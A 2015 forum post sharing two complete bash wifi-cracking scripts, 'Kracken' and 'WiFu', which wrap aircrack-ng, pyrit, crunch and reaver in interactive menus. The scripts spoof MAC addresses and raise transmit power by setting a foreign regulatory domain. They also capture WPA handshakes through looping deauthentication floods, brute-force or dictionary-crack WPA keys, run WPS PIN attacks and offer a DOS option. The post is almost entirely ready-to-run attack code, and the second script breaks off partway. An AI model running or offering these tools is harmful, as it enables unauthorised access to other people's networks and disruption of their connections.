wifi crack SH scripts

by **Shadow.Harvy** Fri Sep 25, 2015 4:47 pm

The Kracken by thisguysayswht
Features:

Wireless interface manipulator.

Hash/rainbow table generator.

Wpa2 Handshake capture

Handshake cracking [pyrit-aircrack] ~ [bruteforce-wordlist-hash tables]

Bruteforce/wordlist time estimation calculator.

Over 55 options in its main and sub menus.

Code:: #!/bin/bash #Configuration: HANDSHAKE='/root/Handshakes/HandShake*.cap' WORDLIST='/usr/share/wordlists/rockyou.txt' COWPATTY='/root/Rainbow/cowpatty' AIROLIB='/root/Rainbow/airolib' MONITER=mon0 #End configuration clear echo "***********[Kracken V-1.0]***********" echo "* *" echo "* Wrtten by: thisguysayswht *" echo "* *" echo "**************[WARNING]**************" echo "* *" echo "* This script can cause damage to *" echo "* your hardware and/or network. I *" echo "* am not responsible for any down *" echo "* time or damages caused. You are *" echo "* responsible for scripts you run *" echo "* *" echo "********[Use at your own risk]*******" echo "" echo "" echo "======[Press enter to continue]======" read START if [[ $START == "" ]]; then sleep 1 clear fi while true do clear echo "*******************[Main Menu]**********************" echo "* *" echo "* (1) View handshakes *" echo "* (2) View interfaces *" echo "* (3) Spoof MAC *" echo "* (4) Boost wireless card *" echo "* (5) Start moniter interface *" echo "* (6) Run wash *" echo "* (7) Run airodump *" echo "* (8) Capture handshakes *" echo "* (9) Create rainbow table *" echo "* (10) Run reaver *" echo "* (11) Run aircrack-ng *" echo "* (12) Run pyrit *" echo "* (13) Restore wireless interface *" echo "* (14) Bruteforce calculator *" echo "* *" echo "* (15) Exit *" echo "* *" echo "****************************************************" echo "" read n case $n in 1) xterm -hold -e "aircrack-ng $HANDSHAKE" & ;; 2) xterm -hold -e iwconfig & ;; 3) clear echo "*************************************************" echo "* Please select a wireless interface from below *" echo "*************************************************" echo "" iwconfig echo "" echo "*************************************************" echo "" read WIRELESS [[ $WIRELESS == "" ]] sleep 1 clear echo "Shutting down $WIRELESS..." echo "" sleep 1 ifconfig $WIRELESS down echo "Changing to random MAC..." echo "" sleep 1 macchanger -r $WIRELESS echo"" echo "Bringing spoffed interface up..." echo "" ifconfig $WIRELESS up sleep 3 clear ;; 4) clear echo "" echo "*****************[WARNING]********************" echo "* *" echo "* Setting your wireless card at a power *" echo "* higher than the OEM spec can damage your *" echo "* card. *" echo "* *" echo "**********************************************" echo "" echo "" echo "========Do you wish to proceed[y/n]?==========" echo "" read START if [[ $START == "y" ]]; then sleep 1 clear echo "*************************************************" echo "* Please select a wireless interface from below *" echo "*************************************************" echo "" iwconfig echo "" echo "*************************************************" echo "" read WIRELESS0 [[ $WIRELESS0 == "" ]] sleep 1 clear echo "Setting country to BO (Bolivia)..." echo "" sleep 1 iw reg set BO echo "Boosting power on $WIRELESS0..." echo "" iwconfig $WIRELESS0 txpower 30 sleep 3 else echo "" echo "Returning to script..." sleep 3 fi;; 5) clear echo "*************************************************" echo "* Please select a wireless interface from below *" echo "*************************************************" echo "" iwconfig echo "" echo "*************************************************" echo "" read WIRELESS2 [[ $WIRELESS2 == "" ]] sleep 1 clear echo "Starting interface on $WIRELESS2..." sleep 1 airmon-ng start $WIRELESS2 sleep 3 clear ;; 6) xterm -hold -e wash -i $MONITER -C & ;; 7) xterm -hold -e airodump-ng $MONITER & ;; 8) clear cd ~ mkdir Handshakes &> /dev/null echo "**********************************" echo "* Please enter the network BSSID *" echo "**********************************" echo "" read BSSID [[ $BSSID == "" ]] clear echo "************************************" echo "* Please enter the network channel *" echo "************************************" echo "" read CHNEL [[ $CHNEL == "" ]] xterm -hold -e "airodump-ng --ig -w Handshakes/HandShake -c $CHNEL --bssid $BSSID $MONITER" & sleep 5 && xterm -hold -e "while true; do sleep 5; aireplay-ng -0 5 -q 2 --ig -a $BSSID $MONITER; done" & ;; 9) while true do clear echo "****************[Rainbow tables]********************" echo "* *" echo "* (1) View handshakes *" echo "* (2) Import rockyou.txt *" echo "* (3) Import wordlist *" echo "* (4) Import custom crunch *" echo "* (5) Add ESSID *" echo "* (6) Remove ESSID *" echo "* (7) View ESSIDs *" echo "* (8) Create rainbow table *" echo "* (9) View rainbow tables *" echo "* (10) Export to airolib *" echo "* (11) Export to cowpatty *" echo "* *" echo "* (12) Return to main script *" echo "* *" echo "****************************************************" echo "" read n case $n in 1) clear xterm -hold -e aircrack-ng $HANDSHAKE & ;; 2) clear gunzip /usr/share/wordlists/rockyou.txt.gz &> /dev/null sleep 2 xterm -hold -e "pyrit -i $WORDLIST import_passwords" & ;; 3) clear echo "***********************************************" echo "* Enter full path to password file for import *" echo "***********************************************" echo "" read READES [[ $READES == "" ]] xterm -hold -e "pyrit -i '$READES' import_passwords" & ;; 4) clear echo "****************************************************" echo "* What arguments would you like to pass to crunch? *" echo "****************************************************" echo "" read CRUNCH [[ $CRUNCH == "" ]] xterm -hold -e "crunch $CRUNCH|pyrit -i- import_passwords" & ;; 5) clear echo "***************" echo "* Enter ESSID *" echo "***************" echo "" read READES [[ $READES == "" ]] xterm -hold -e "pyrit -e '$READES' create_essid" & ;; 6) clear echo "***************" echo "* Enter ESSID *" echo "***************" echo "" read READES [[ $READES == "" ]] xterm -hold -e "pyrit -e '$READES' delete_essid" & ;; 7) clear xterm -hold -e "pyrit list_essids" & ;; 8) clear echo "***************" echo "* Enter BSSID *" echo "***************" echo "" read READBS [[ $READBS == "" ]] xterm -hold -e "pyrit -i- -b $READBS batch" & ;; 9) clear xterm -hold -e "pyrit eval" & ;; 10) clear cd ~ mkdir Rainbow &> /dev/null xterm -hold -e "pyrit -o $AIROLIB export_hashdb" & ;; 11) clear cd ~ mkdir Rainbow &> /dev/null xterm -hold -e "pyrit -o $COWPATTY export_hashdb" & ;; 12) clear break;; *) clear echo "*******************************************" echo "* Invalid option. Press any key to return *" echo "*******************************************" read -p "";; esac sleep 1 done;; 10) clear echo "****************************************************" echo "* Enter BSSID you would like to attack with reaver *" echo "****************************************************" echo "" read RBSSID [[ $RBSSID == "" ]] sleep 1 clear echo "***************************************************************" echo "* Enter arguments you would like to pass to reaver [optional] *" echo "***************************************************************" echo "" read REAVERA [[ $REAVERA == "" ]] echo "Starting reaver attack..." sleep 3 clear xterm -hold -e "reaver -i $MONITER -b $RBSSID $REAVERA -vv" & ;; 11) while true do clear echo "*****************[Aircrack-ng]**********************" echo "* *" echo "* (1) View handshakes *" echo "* (2) Use rockyou.txt *" echo "* (3) Bruteforce 8 numeric *" echo "* (4) Bruteforce 9 numeric *" echo "* (5) Bruteforce 10 numeric *" echo "* (6) Bruteforce 8 a-z *" echo "* (7) Bruteforce 8 A-Z *" echo "* (8) Bruteforce 8 a-z + numeric *" echo "* (9) Bruteforce 8 A-Z + numeric *" echo "* (10) Bruteforce 8 a-z + A-Z *" echo "* (11) Bruteforce custom *" echo "* (12) Specify wordlist *" echo "* (13) Use rainbow table *" echo "* *" echo "* (14) Exit to main script *" echo "* *" echo "****************************************************" echo "" read n case $n in 1) xterm -hold -e aircrack-ng $HANDSHAKE & ;; 2) clear echo "Decompressing rockyou.txt..." echo "" gunzip /usr/share/wordlists/rockyou.txt.gz &> /dev/null sleep 1 echo "Starting attack..." echo "" sleep 3 xterm -hold -e aircrack-ng -w $WORDLIST $HANDSHAKE & ;; 3) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *" echo "*****************************************************" echo "" read FKUAC [[ $FKUAC == "" ]] sleep 1 echo "Starting bruteforce 8 numeric" echo "" xterm -hold -e "crunch 8 8 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;; 4) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *" echo "*****************************************************" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 9 numeric" echo "" xterm hold -e "crunch 9 9 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;; 5) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *" echo "*****************************************************" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 10 numeric" echo "" xterm -hold -e "crunch 10 10 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;; 6) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *"# echo "*****************************************************" echo "" read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 a-z" echo "" xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyz|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;; 7) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *" echo "*****************************************************" echo ""# read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 A-Z" echo "" xterm -hold -e "crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;; 8) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *" echo "*****************************************************" echo ""# read FKUAC [[ $FKUAC == "" ]] echo "Starting bruteforce 8 a-z numeric" echo "" xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyz1234567890|aircrack-ng -a 2 -w- -b $FKUAC #$HANDSHAKE" & ;; 9) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *" echo "*****************************************************" echo "" read FKUAC [[ $FKUAC == "" ]] # echo "Starting bruteforce 8 A-Z numeric" echo "" xterm -hold -e "crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;; 10) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *" echo "*****************************************************" echo "" read FKUAC [[ $FKUAC == "" ]] # echo "Starting bruteforce 8 a-z A-Z" echo "" xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;; 11) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *" echo "*****************************************************" echo "" read FKUAC [[ $FKUAC == "" ]] clear echo "****************************************************" echo "* What arguments would you like to pass to crunch? *" echo "****************************************************" echo "" read CRUNCH [[ $CRUNCH == "" ]] echo "" echo "Starting custom bruteforce attack" echo "" xterm -hold -e "crunch $CRUNCH|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;; 12) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *" echo "*****************************************************" echo "" read FKUAC [[ $FKUAC == "" ]] clear echo "**********************************************" echo "* Please enter the full path to the wordlist *" echo "**********************************************" echo "" read WCUST [[ $WCUST == "" ]] echo "" echo "Attacking with $WCUST" echo "" xterm -hold -e "aircrack-ng -a 2 -w '$WCUST' -b $FKUAC $HANDSHAKE" & ;; 13) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *" echo "*****************************************************" echo "" read FKUAC [[ $FKUAC == "" ]] echo "" echo "Attacking with airolib hash table" echo "" xterm -hold -e "aircrack-ng -r '$AIROLIB' -b $FKUAC $HANDSHAKE" & ;; 14) clear break;; *) clear echo "*******************************************" echo "* Invalid option. Press any key to return *" echo "*******************************************" read -p "" esac sleep 1 done;; 12) while true do clear echo "*********************[Pyrit]************************" echo "* *" echo "* (1) View handshakes *" echo "* (2) Use rockyou.txt *" echo "* (3) Bruteforce 8 numeric *" echo "* (4) Bruteforce 9 numeric *" echo "* (5) Bruteforce 10 numeric *" echo "* (6) Bruteforce 8 a-z *" echo "* (7) Bruteforce 8 A-Z *" echo "* (8) Bruteforce 8 a-z + numeric *" echo "* (9) Bruteforce 8 A-Z + numeric *" echo "* (10) Bruteforce 8 a-z + A-Z *" echo "* (11) Bruteforce custom *" echo "* (12) Specify wordlist *" echo "* (13) Use rainbow table *" echo "* (14) Benchmark pyrit *" echo "* *" echo "* (15) Exit to main script *" echo "* *" echo "****************************************************" echo "" read n case $n in 1) xterm -hold -e aircrack-ng $HANDSHAKE & ;; 2) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *" echo "*****************************************************" echo "" read PYRITB [[ $PYRITB == "" ]] echo "Decompressing rockyou.txt..." echo "" gunzip /usr/share/wordlists/rockyou.txt.gz &> /dev/null sleep 2 echo "Starting attack..." echo "" sleep 3 xterm -hold -e "pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;; 3) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *" echo "*****************************************************" echo "" read PYRITB [[ $PYRITB == "" ]] echo "Starting bruteforce 8 numeric" echo "" xterm -hold -e "crunch 8 8 1234567890|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;; 4) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *" echo "*****************************************************" echo "" read PYRITB [[ $PYRITB == "" ]] echo "Starting bruteforce 9 numeric" echo "" xterm -hold -e "crunch 9 9 1234567890|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;; 5) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *" echo "*****************************************************" echo "" read PYRITB [[ $PYRITB == "" ]] echo "Starting bruteforce 10 numeric" echo "" xterm -hold -e "crunch 10 10 1234567890|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;; 6) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *" echo "*****************************************************" echo "" read PYRITB [[ $PYRITB == "" ]] echo "Starting bruteforce 8 a-z" echo "" xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyz|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;; 7) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *" echo "*****************************************************" echo "" read PYRITB [[ $PYRITB == "" ]] echo "Starting bruteforce 8 A-Z" echo "" xterm -hold -e "crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;; 8) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *" echo "*****************************************************" echo "" read PYRITB [[ $PYRITB == "" ]] echo "Starting bruteforce 8 a-z numeric" echo "" xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyz1234567890|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;; 9) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *" echo "*****************************************************" echo "" read PYRITB [[ $PYRITB == "" ]] echo "Starting bruteforce 8 A-Z numeric" echo "" xterm -hold -e "crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;; 10) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *" echo "*****************************************************" echo "" read PYRITB [[ $PYRITB == "" ]] echo "Starting bruteforce 8 a-z A-Z" echo "" xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;; 11) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *" echo "*****************************************************" echo "" read PYRITB [[ $PYRITB == "" ]] clear echo "****************************************************" echo "* What arguments would you like to pass to crunch? *" echo "****************************************************" echo "" read PYRITB [[ $PYRITB == "" ]] echo "" echo "Starting custom bruteforce attack" echo "" xterm -hold -e "crunch $CRUNCH|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;; 12) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *" echo "*****************************************************" echo "" read PYRITB [[ $PYRITB == "" ]] clear echo "**********************************************" echo "* Please enter the full path to the wordlist *" echo "**********************************************" echo "" read WCUST [[ $WCUST == "" ]] echo "" echo "Attacking with $WCUST" echo "" xterm -hold -e "pyrit -i '$WCUST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;; 13) clear echo "*****************************************************" echo "* Please enter the network BSSID you wish to attack *" echo "*****************************************************" echo "" read PYRITB [[ $PYRITB == "" ]] echo "" echo "Attacking with rainbow table" echo "" xterm -hold -e "pyrit -r '$HANDSHAKE' -b '$PYRITB' attack_db" & ;; 14) clear xterm -hold -e "pyrit benchmark" & ;; 15) clear break;; *) clear echo "*******************************************" echo "* Invalid option. Press any key to return *" echo "*******************************************" read -p "" esac sleep 1 done;; 13) clear echo "*************************************************" echo "* Please select a wireless interface from below *" echo "*************************************************" echo "" iwconfig echo "" echo "*************************************************" echo "" read WIRELESS3 [[ $WIRELESS3 == "" ]] clear echo "Resetting country..." echo "" sleep 1 iw reg set BO echo "Resetting power..." echo "" iwconfig $WIRELESS3 txpower 20 sleep 1 echo "Disabling moniter mode..." echo "" sleep 1 airmon-ng stop $MONITER echo "Shutting down main wireless interface..." echo "" sleep 1 ifconfig $WIRELESS3 down echo "Restoring perment MAC..." echo "" sleep 1 macchanger -p $WIRELESS3 echo "Bringing main wireless interface back up..." echo "" sleep 1 ifconfig $WIRELESS3 up echo "Wireless interface restored" echo "" sleep 3;; 14) clear echo "*************************" echo "* Enter keys per second *" echo "*************************" echo "" read KPS [[ $KPS == "" ]] clear echo "*************************" echo "* Enter wordlist length *" echo "*************************" echo "" read WLL [[ $WLL == "" ]] ((A=$WLL/$KPS)) ((B=$A/60)) ((C=$B/60)) ((D=$C/24)) ((E=$D/7)) ((F=$E/52)) clear echo "****************************" echo "* Bruteforce time estimate *" echo "****************************" echo "" echo "" echo "SECONDS: $A" echo "" echo "MINUTES: $B" echo "" echo "HOURS: $C" echo "" echo "DAYS: $D" echo "" echo "WEEKS: $E" echo "" echo "YEARS: $F" echo "" echo "" echo "*************************" echo "* Press enter to return *" echo "*************************" read -p "";; 15) clear echo "***********" echo "* Goodbye *" echo "***********" sleep 3 clear exit;; *) clear echo "*******************************************" echo "* Invalid option. Press any key to return *" echo "*******************************************" read -p "";; esac done ./Kracken.sh

Disclaimer:

I am not responsible for what you do with this code.
If this code sets your computer on fire, I am not responsible.
If you use this code irresponsibly, and the FBI kicks your door down, I am not responsible.
This code is designed to test the security of your router, and not anyone else's.
If this code gets you laid, I might take responsibility.
If you use this code, you are agreeing that it is at your own risk.

WiFu is a simple bash script that uses the Aircrack-ng suite to make WiFi cracking a breeze...

By:thaGH05T

Code:: #!/bin/bash ################################################################################################## # WiFu is a simple bash script that uses the Aircrack-ng suite to make WiFi cracking a breeze... # # # # v1.0 By:thaGH05T Email support questions to john@ghostlyhaks.com # ################################################################################################## # This program is free software; you can redistribute it and/or modify it under the terms of the # # GNU General Public License as published by the Free Software Foundation; either version 2 of # # the License, or any later version. # # # # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; # # without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See # # the GNU General Public License for more details. # # # # You should have received a copy of the GNU General Public License along with this program; if # # not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, # # MA 02110-1301, USA. # ################################################################################################## ######### Start by clearing the terminal. clear ############### Catch ctrl-c input from user trap main 2 ############# Set global functions main () { clear echo -e " \e[1;34m[*]\e[0m Please wait while we clean up your mess... " airmon-ng stop mon0 >>.trash.txt if [[ -e .trash.txt ]] ; then rm .trash.txt fi if [[ -e .wifi.kate-swp ]] ; then rm .wifi.kate-swp fi sleep 3 bash ${0} kill $$ } ########### Loop for main menu mainmenu=1 while [[ $mainmenu == 1 ]] ; do # Run only as root. if [ "$(id -u)" != "0" ]; then echo -e " \e[1;31m[!]\e[0m \e[1;5m This script must be run as root!!! \e[0m " exit 1 else clear fi ########### Create variable for the title. atitle=" \e[31m############################################\e[0m \e[31m#\e[0m \e[34mWiFu v1.0 - By:thaGH05T\e[0m \e[31m#\e[0m \e[31m#\e[0m \e[31m#\e[0m \e[31m#\e[0m \e[34mFor support email john@ghostlyhaks.com\e[0m \e[31m#\e[0m \e[31m#\e[0m \e[31m#\e[0m \e[31m#\e[0m \e[34mMaking WiFi cracking easy since 2013\e[0m \e[31m#\e[0m \e[31m############################################\e[0m \e[31m ( ( ( )\ ) )\))( ' ( (()/( ( ((_)()\ ) )\ /(_)) ))\ _(())\_)()((_) (_))_|/((_) \ \((_)/ / (_) | |_ (_))( \ \/\/ / | | | __|| || | \_/\_/ |_| |_| \_,_| \e[0m Press \e[1;31mCtrl+C\e[0m at any time to quit and return to the main menu. Wich attack would you like to launch first??? " ################### Set the prompt prompt="Option: " ################### Set options options=("Just Listen" "Just Crack" "Spoof MAC" "WPA" "WEP" "DOS" "Main Menu" "Quit") echo -e "$atitle" PS3=" $prompt" #################### What each option does select opt in "${options[@]}" ; do case $opt in ###################### Start Just Listen "Just Listen") jl=1 while [[ $jl == 1 ]] ; do clear echo -e ifconfig | grep wlan echo -e " \e[1;34m[*]\e[0m Wich of the above wireless interfaces would you like to put in monitor mode? [wlan0] " read card if [[ $card == "" ]] ; then card=wlan0 fi if [[ $card == wlan* ]] ; then echo -e " Press \e[1;31mCtrl+C\e[0m at any time to quit and return to the main menu. " sleep 2 airmon-ng start $card >>.trash.txt airodump-ng mon0 jl=0 else clear echo -e " \e[1;31m[!]\e[0m Not a valid wireless device. Please try again." sleep 3 fi done ;; ##################### Start Just Crack "Just Crack") jc=1 while [[ $jc == 1 ]] ; do clear echo -e " \e[1;34m[*]\e[0m What would you like to do? [1|2] 1) Use pre-computed rainbow tables. 2) Use dictionary file or word-list. " read crack if [[ $crack == 1 ]] ; then clear echo -e " \e[1;34m[*]\e[0m OK, Using pre computed rainbow tables. " sleep 3 clear echo -e " \e[1;34m[*]\e[0m What is the ESSID of the targeted network? (If the target network name has spaces make sure to place it in quotations) " read essid echo -e " \e[1;34m[*]\e[0m What is the absolute path to the rainbow tables you will be using? (You may drag-n-drop the file to populate, but do not leave trailing spaces!) " read rt echo -e " \e[1;34m[*]\e[0m What is the absolute path to the capture file you want to crack? (You may drag-n-drop the file to populate, but do not leave trailing spaces!) " read cap cowpatty â€“s $essid â€“d $rt â€“r $cap || { echo -e ' \e[1;31m[!]\e[0m Operation failed! Program will now exit. ' ; exit 1; } jc=0 elif [[ $crack == 2 ]] ; then clear echo -e " \e[1;34m[*]\e[0m Ok, using dictionary or word-list " sleep 3 clear echo -e " \e[1;34m[*]\e[0m What is the absolute path to the dictionary or word-list you want to use? (You may drag-n-drop the file to populate, but do not leave trailing spaces!) " read word echo -e " \e[1;34m[*]\e[0m What is the absolute path to the ivs file you want to crack? (You may drag-n-drop the file to populate, but do not leave trailing spaces!) " read ivs aircrack-ng -l ~/cracked-password.txt -w $word $ivs || { echo -e ' \e[1;31m[!]\e[0m Operation failed! Program will now exit. ' ; exit 1; } jc=0 else clear echo -e " \e[1;31m[!]\e[0m Not a valid operation. Please try again. " sleep 3 fi done echo -e " \e[1;32mAll Done!!!\e[0m - If you used a dictionary or word-list and your passphrase was found then it was saved to cracked-password.txt in your home directory. If you use rainbow tables and your passphrase was found it is listed above so take the time to record it now. Press \e[1;31mCtrl+C\e[0m at any time to quit and return to the main menu. " ;; #################### Start Spoof MAC "Spoof MAC") sm=1 while [[ $sm == 1 ]] ; do clear echo -e ifconfig | grep wlan echo -e " \e[1;34m[*]\e[0m Wich of the above wireless interfaces would you like to put in monitor mode? [wlan0] " read card if [[ $card == "" ]] ; then card=wlan0 fi if [[ $card == wlan* ]] ; then ifconfig $card down >>.trash.txt macchanger -r $card ifconfig $card up >>.trash.txt sm=0 else clear echo -e " \e[1;31m[!]\e[0m Not a valid wireless device. Please try again." sleep 3 fi done echo -e " All done!!! Press \e[1;31mCtrl+C\e[0m at any time to quit and return to the main menu. " ;; ############### Start WPA "WPA") ncard=1 while [[ $ncard == 1 ]] ; do clear echo -e ifconfig | grep wlan echo -e " \e[1;34m[*]\e[0m Wich of the above wireless interfaces would you like to put in monitor mode? [wlan0] " read card if [[ $card == "" ]] ; then card=wlan0 fi if [[ $card == wlan* ]] ; then clear ncard=0 else clear echo -e " \e[1;31m[!]\e[0m Not a valid wireless device. Please try again." sleep 3 fi done clear airmon-ng start $card >>.trash.txt echo -e " \e[1;34m[*]\e[0m New tabs will open running various commands to gather info. Come back to this tab to input data. " sleep 5 konsole --new-tab -e airodump-ng mon0 2>>.trash.txt qnet=1 while [[ $qnet == 1 ]] ; do echo -e " \e[1;34m[*]\e[0m What is the name of the network you want to target? " read net if [[ $net == "" ]] ; then clear echo -e " \e[1;31m[!]\e[0m You didn't type anything. Please try again. " sleep 3 elif [[ $net == * ]] ; then clear qnet=0 fi done qone=1 while [[ $qone == 1 ]] ; do echo -e " \e[1;34m[*]\e[0m What is the BSSID of the network you want to target? " read bssid if [[ $bssid == "" ]] ; then clear echo -e " \e[1;31m[!]\e[0m You didn't type anything. Please try again. " sleep 3 elif [[ $bssid == * ]] ; then clear qone=0 fi done qtwo=1 while [[ $qtwo == 1 ]] ; do echo -e " \e[1;34m[*]\e[0m What channel is the network on? " read chan if [[ $chan == "" ]] ; then clear echo -e " \e[1;31m[!]\e[0m You didn't type anything. Please try again. " sleep 3 elif [[ $chan == * ]] ; then clear qtwo=0 fi done qthree=1 while [[ $qthree == 1 ]] ; do echo -e " \e[1;34m[*]\e[0m What do you want to name the capture file? " read name if [[ $name == "" ]] ; then clear echo -e " \e[1;31m[!]\e[0m You didn't type anything. Please try again. " sleep 3 elif [[ $name == * ]] ; then qthree=0 fi done clear echo -e " \e[1;34m[*]\e[0m You now have 10 seconds to close the previousely opened tab. GO! " sleep 10 clear howonetwo=1 while [[ $howonetwo == 1 ]] ; do clear echo -e " \e[1;34m[*]\e[0m How do you plan on cracking the capture file? [1|2] 1) With pre-computed rainbow tables. 2) Wth a dictionary file or word-list. " read how if [[ $how == "1" ]] ; then konsole --new-tab -e airodump-ng -c $chan -w $name --bssid $bssid mon0 2>>.trash.txt howonetwo=0 elif [[ $how == "2" ]] ; then konsole --new-tab -e airodump-ng -c $chan -w $name --bssid $bssid --ivs mon0 2>>.trash.txt howonetwo=0 else clear echo -e " \e[1;31m[!]\e[0m Not a valid operation. Please try again. " sleep 3 fi done clear echo -e " \e[1;34m[*]\e[0m OK, lets try and deauthenticate a client to get the handshake. What is the station ID? " read client handyn=1 while [[ $handyn == 1 ]] ; do echo -e aireplay-ng -0 10 -a $bssid -c $client mon0 echo -e " \e[1;34m[*]\e[0m Look in the window that was opened a minute ago and see if the handshake appeared at the top. " echo -e " \e[1;34m[*]\e[0m Did the handshake appear? [y|n|new] " read hand if [[ $hand == y ]] ; then clear echo -e " \e[1;34m[*]\e[0m OK, time to crack the capture file! " sleep 3 handyn=0 elif [[ $hand == n ]] ; then clear echo -e " \e[1;34m[*]\e[0m OK, lets try again. If you do not recieve a handshake after a few more tries you can type [new] to deauthenticate a different client or you can press \e[1;31mCtrl+C\e[0m to go back to the main menu. " sleep 5 clear elif [[ $hand == new ]] ; then clear echo -e " \e[1;34m[*]\e[0m OK, lets try and deauthenticate a client to get the handshake. What is the station ID? " read client else clear echo -e " \e[1;31m[!]\e[0m Invalid operation. Please try again. " fi done if [[ $how == 1 ]] ; then where=1 while [[ $where == 1 ]] ; do echo -e " \e[1;34m[*]\e[0m What is the absolute path to the rainbow tables you will be using? (You may drag-n-drop the file to populate, but do not leave trailing spaces!) " read rt if [[ $rt == "" ]] ; then clear echo -e " \e[1;31m[!]\e[0m Invalid file path. Please try again. " else clear where=0 fi done cowpatty â€“s $net â€“d $rt â€“r ~/$name-01.cap || { echo -e ' \e[1;31m[!]\e[0m Operation failed! Program will now exit. ' ; exit 1; } elif [[ $how == 2 ]] ; then what=1 while [[ $what == 1 ]] ; do echo -e " \e[1;34m[*]\e[0m What is the absolute path to the dictionary or word-list you want to use? (You may drag-n-drop the file to populate, but do not leave trailing spaces!) " read word if [[ $word == "" ]] ; then clear echo -e " \e[1;31m[!]\e[0m Invalid file path. Please try again. " else clear what=0 fi done aircrack-ng -l ~/cracked-password.txt -w $word ~/$name-01.ivs || { echo -e ' \e[1;31m[!]\e[0m Operation failed! Program will now exit. ' ; exit 1; } fi echo -e " \e[1;32mAll Done!!!\e[0m - If you used a dictionary or word-list and your passphrase was found then it was saved to cracked-password.txt in your home directory. If you used rainbow tables and your passphrase was found it is listed above so take the time to record it now. Press \e[1;31mCtrl+C\e[0m at any time to quit and return to the main menu. " ;; ##################### Start WEP "WEP") ncard=1 while [[ $ncard == 1 ]] ; do clear echo -e ifconfig | grep wlan echo -e " \e[1;34m[*]\e[0m Wich of the above wireless interfaces would you like to put in monitor mode? [wlan0] " read card if [[ $card == "" ]] ; then card=wlan0 fi if [[ $card == wlan* ]] ; then clear ncard=0 else clear echo -e " \e[1;31m[!]\e[0m Not a valid wireless device. Please try again." sleep 3 fi done clear airmon-ng start $card >>.trash.txt echo -e " \e[1;34m[*]\e[0m New tabs will open running various commands to gather info. Come back to this tab to input data. " sleep 5 konsole --new-tab -e airodump-ng mon0 2>>.trash.txt qone=1 while [[ $qone == 1 ]] ; do echo -e " \e[1;34m[*]\e[0m What is the BSSID of the network you want to target? " read bssid if [[ $bssid == "" ]] ; then clear echo -e " \e[1;31m[!]\e[0m You didn't type anything. Please try again. " sleep 3 elif [[ $bssid == * ]] ; then clear qone=0 fi done qtwo=1 while [[ $qtwo == 1 ]] ; do echo -e " \e[1;34m[*]\e[0m What channel is the network on? " read chan if [[ $chan == "" ]] ; then clear echo -e " \e[1;31m[!]\e[0m You didn't type anything. Please try again. " sleep 3 elif [[ $chan == * ]] ; then clear qtwo=0 fi done qthree=1 while [[ $qthree == 1 